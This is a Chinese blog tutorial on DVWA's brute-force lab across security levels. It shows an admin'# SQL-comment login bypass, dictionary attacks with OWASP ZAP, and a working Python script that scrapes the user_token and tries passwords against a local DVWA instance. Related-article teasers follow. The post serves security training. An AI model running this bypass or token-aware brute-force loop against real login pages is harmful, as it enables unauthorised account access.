DVWA暴力破解(low-high)

最新推荐文章于 2024-07-15 14:29:09 发布
最新推荐文章于 2024-07-15 14:29:09 发布
阅读量3.4k 收藏 6
点赞数 2
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44105778/article/details/88319572
版权

一、 第一题

先从难度是low的开始。
我们尝试了下admin’# 直接把密码注释掉,
在这里插入图片描述
成功破解。
我们尝试下medium等级
还是尝试了下admin’#,发现密码错误,看来这个漏洞被防护了
在这里插入图片描述

首先我们抓包看下http请求头的信息,发现可以在http头部看到看到我们提交的账号密码,既然这样我们使用owasp zap 软件暴力破解。
在这里插入图片描述
这是我使用的字典,大家可以去百度搜索更多的字典
在这里插入图片描述
暴力成功破解出账号密码。
在这里插入图片描述
下面我们尝试high等级,发抓包发现多了个user_token(它的职责是保护用户的用户名及密码多次提交,以防密码泄露。)
且每一次的user_take会被记录到下一次请求头里的referrer里。这样上面的方法我们就不能使用了。
但是认真观察,我们可以发现第一次进登录页面是没有user_token,这就是突破口。那么就可以一直在登录界面和第一次登录进行破解。
还有一种思路是虽然加了user_token,但是并没有对尝试的次数进行限制,我们可以先获取user_token,然后用user_token加上用户密码验证身份。
我们使用python脚本自动化爆力破解(第二种思路)。

from bs4 import BeautifulSoup
import requests

header={
        'GET': 'http://localhost/DVWA/vulnerabilities/brute/ HTTP/1.1',
        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Referer':'http://localhost/DVWA/vulnerabilities/brute/',
        'cookie':'PHPSESSID=8fbhto539r4fnjt4dduolvikj3; security=high',
        'Connection':'keep-alive',
        'Upgrade-Insecure-Requests':'1',
         'Host':'127.0.0.1'
        }
requrl="http://127.0.0.1/DVWA/vulnerabilities/brute/"

def get_token(requrl,header):
    response=requests.get(url=requrl,headers=header)
    print (response.status_code,len(response.content))
    soup=BeautifulSoup(response.text,"html.parser")
    input=soup.form.select("input[type='hidden']")   #返回的是一个list列表
    user_token=input[0]['value']                   #获取用户的token
    return user_token

user_token=get_token(requrl,header)
i=0
for line in open("password.txt"):
    requrl="http://127.0.0.1/DVWA/vulnerabilities/brute/?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token
    i=i+1
    print (i , 'admin' ,line.strip(),end="  ")
    user_token=get_token(requrl,header)
    # 尝试次数
    if(i==20):
        break

在这里插入图片描述)

我们继续查看impose等级,发现输错3次就被限制15分钟无法登入。那么还有什么是可以防止暴力破解的呢?还有验证码。

giunwr
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA 暴力破解 low
Neko的博客
03-11 500
DVWA 暴力破解 low 这里的环境是 一个win7系统 一个KALI系统 所需: DVWA-master.zip 下载地址传送门 phpStudy.zip 下载地址传送门 1.启动phpStudy 通过【其他选项菜单–>phpStudy设置–>端口常规设置】检测端口是否有被其他程序占用,若占用了则修改一下httpd端口 2.Mysql 设置 根据mysql数据库设置的账户信息(用户名/密码:root-----root),填写到phpMyAdmin登录界面对应的输入框进行登录 环境监
dvwa靶场之暴力破解(安全等级:low
不可言传的博客
07-10 3347
条件 靶场地址:http://192.168.126.130/vulnerabilities/brute/ 由于我们的安全登录设置的是low,没有任何的限制,我们就以爆破admin为目标。 使用工具:burp suite v2.1.05 目的 学会使用burp suite爆破功能的简单使用 开始 启动好burp suite,设置好代理,启用拦截,走起 一、抓登录数据包 用户名:admin 密码:随意输入 burp suite提示拦截到了数据包 二、分析数据包 这个地方就是密码,就是我们爆破的
DVWA——Brute Force 暴力破解 Low
Talent Q的博客
05-31 326
界面: 目标: 这里的暴力破解就是,使用自己的用户名和密码字典,一个个尝试是否能登陆成功,即穷举。 一、打开BurpSuit,配置好代理,准备抓取浏览器的数据包。 二、在DVWA界面表单中随意输入用户名和密码,然后点击"Login"提交。 例如: Username:talentq Password:123456 三、提交后通过BurpSuit实施暴力破解。 1、表单提交后,BurpSuit就会截取到数据包; 2、在空白处右键选择"Send to Intruder",或者直接按Ctrl+I键; 3、
网络安全 DVWA通关指南 DVWA Brute Force (爆破)
最新发布
YueXuan_521的博客
07-15 897
网络安全 DVWA通关指南 DVWA Brute Force ( DVWA Brute Force (爆破) 文章目录 DVWA Brute Force (爆破) Low Medium High Impossible遍历,只是一个选字典1,一个选字典2(相当于50m赛跑同时出发,只是赛道不同,互不干扰。2、密码验证方面,增加验证失败睡眠两秒的限制,这会加大爆破所需要的时间。但只要时间充足,爆破出密码不是问题。使用字典进行爆破,字典可以自己制作,也可以网上直接下载,等待片刻爆破完成,使用爆破出的密码就能登录。
DVWA暴力破解high
Z_l123的博客
03-07 300
输入用户名,密码抓包 发现增加了user_token参数,所以爆破要选择两个参数来进行,先将请求发送到intruder,设置两个参数 password和user_token为变量,攻击类型选择pitchfork 设置线程为1,因为Recursive_Grep模式不支持多线程攻击 设置token,并复制value值 将Redirections设置为Always 设置payload 点击start attack攻击爆破,结果成功爆破,如下图所示 ...
DVWA-LOW等级暴力破解
weixin_47498728的博客
05-05 1034
1、使用phpstudy,启动Apache和Mysql服务 2、打开Burp Suite,一直Next就可以 3、开始使用工具,无需配置网络代理,拦截状态显示OFF 4、进入dvwa,网址:http://localhost/login.php 使用默认账号密码登录,admin password 5、将安全等级设置为low 6、开启抓包工具,拦截状态显示ON 7、选择暴力破解,输入任意的账号密码,login 8、在Burp Suite中得到请求代码,全选按Ctrl+I或者点击鼠标右键Send t
DVWA暴力破解high级别
m0_46432705的博客
05-26 1276
DVWA暴力破解high级别 low和medium级别的这里就不在多说,CSDN里面有很多,大家一看都能看懂,这里我重点强调的是high等级的暴力破解 phpstudy和DVWA 环境查看我的上篇文章 首先在浏览器开启代理,同时在burpsuite也开启代理 下面将DVWA的等级调为high,然后进入暴力破解模块,在username位置输入admin,password的位置随便输入 我们发现比low 和medium多了个user_token参数,直接将抓取的数据包发送到intrude
dvwa通关教程--暴力破解
weixin_67803043的博客
09-21 574
dvwa通关教程--暴力破解
实验1-DVWA部署暴力破解.docx
01-05
2. 能应用Low等级、Medium等级的暴力破解手工和自动化方法; 3. 能应用High等级的暴力破解自动化方法及Impossible等级修复方法; 4. 能用算法描述暴力破解过程(范围、动作、结果)。 1. 暴力破解原理 暴力破解的原理...
DVWA系列---Brute Force暴力破解
野原新之助
01-21 459
文章目录一、low级别二、medium级别三、high级别Token简述 实验使用bp进行抓包暴力破解,并提前写好账号密码字典。 一、low级别 安全措施:无任何防护措施 1、使用bp抓包 2、发送至intruder并添加参数,选择形式 3、增加线程后,实施攻击 根据响应长度,判断出正确账号密码。 (查看源代码) <?php if( isset( $_GET[ 'Login' ] )...
DVWA】--- 一、暴破(BruteForce)
qq_43168364的博客
05-31 1434
BruteForce 一、low 在登录时使用bp进行抓包 将抓到的包发送到Intruder模块。设置需要爆破的参数,和爆破的类型。 这里爆破的类型一共有四种: sniper:一个字典,先匹配第一项再匹配第二项。 Battering ram:一个字典,同用户名同密码匹配。 Pitchfork:两个字典,同行匹配,短的截至。 Cluster bomb:两个字典,交叉匹配所有可能。 一般建议......
DVWA系列之Brute Force(暴力破解)源码分析及漏洞利用
7Riven's blog
11-26 2011
Brute Force Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一。字典本生成:http://tools.mayter.cn/ 目录 low级别源码分析 medium级别源码分析 high级别源码分析​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​...
dvwa靶场暴力破解漏洞高级(high
m0_73128456的博客
11-13 1917
5.然后我们去添加线程,点击options,然后找到Grep-Extract然后点击add添加点击Fetch response,然后在token,它就可以帮你找到token,在选择图中value=’后的值,它就会帮你填写,再点击ok,就可以了,如图。2.在dvwa靶场中,输入一个用户名和你的密码(前提是知道用户名或者密码,反正你要知道一个)我这里是知道用户名的情况,如果你知道密码不知道用户名也是同样方法。3.然后,我们看抓包工具抓的内容,我们要把它上传到intruder模块,它会亮你就点击就可以。
dvwa靶场之暴力破解low级别)<运用burp suite工具>
m0_63314341的博客
01-17 6365
首先,我们需要做好一些准备工作。 1.dvwa靶场的搭建(phpstudy) 2.burp suite工具的安装 3.对于将要爆破的浏览器进行代理插件(proxy)的安装以及证书(ca)的安装 4.设置自己电脑的代理 代理插件的下载以及证书的下载以及对自己电脑的设置都是为了我们的burp suite能够在浏览器上成功的抓上包。 本篇文章重在讲述实操过程,请...
dvwa暴力破解
yuysjx的博客
01-26 526
dvwa暴力破解
DVWA暴力破解
weixin_44023403的博客
11-23 1016
DVWA暴力破解DVWA简介暴力破解(Brute Force)lowMedium DVWA简介 需要Apache和MySql的集成环境,可以安装phpStudy,在phpStudy的WWW文件下搭建DWVA靶场。 DVWA默认的用户有5个,用户名密码如下(记住一个就可以了): admin/password gordonb/abc123 smithy/password 1337/charley pablo/letmein DVWA乱码问题的解决办法: 到DVWA安装目录下 (…/WWW/DVWA/d
DVWA_暴力破解low等级攻略
Keiltest的博客
07-13 998
是一个与刚入门计算机的同伴互相探讨相互请教的资源
2.暴力破解漏洞(Low)——DVWA
qwsn
11-24 1506
0x01:基于DVWALow级别 1.开启代理,使用burpsuite抓包: 分析是否有密码之类的参数,以便为爆破提供数据依据 2.进行暴力破解: 发送到intruder模块暴力破解即可 密码:password ...
DVWA(1)暴力破解(Brute Force) LOW-HIGHT 操作记录
lllllaaa111的博客
10-20 1366
初次接触DVWA,写下自己的操作记录,希望可以帮助每个刚接触DVWA的新手,同时希望可以提升自己的技术。注:如有操作不当的地方希望可以得到大神指导、交流。
dvwa暴力破解参考文献
05-19
以下是dvwa暴力破解的参考文献: 1. DVWA官方文档:https://github.com/ethicalhack3r/DVWA/wiki 2. DVWA漏洞实验平台及渗透测试实战详解:https://www.cnblogs.com/-qing-/p/11787296.html 3. DVWA实验环境搭建及基础渗透练习:https://www.freebuf.com/column/190901.html 4. DVWA实验环境搭建及基础渗透实战:https://www.cnblogs.com/ssooking/p/11678143.html 5. DVWA密码破解实例分析:https://www.cnblogs.com/iamstudy/articles/12680426.html 希望对你有所帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值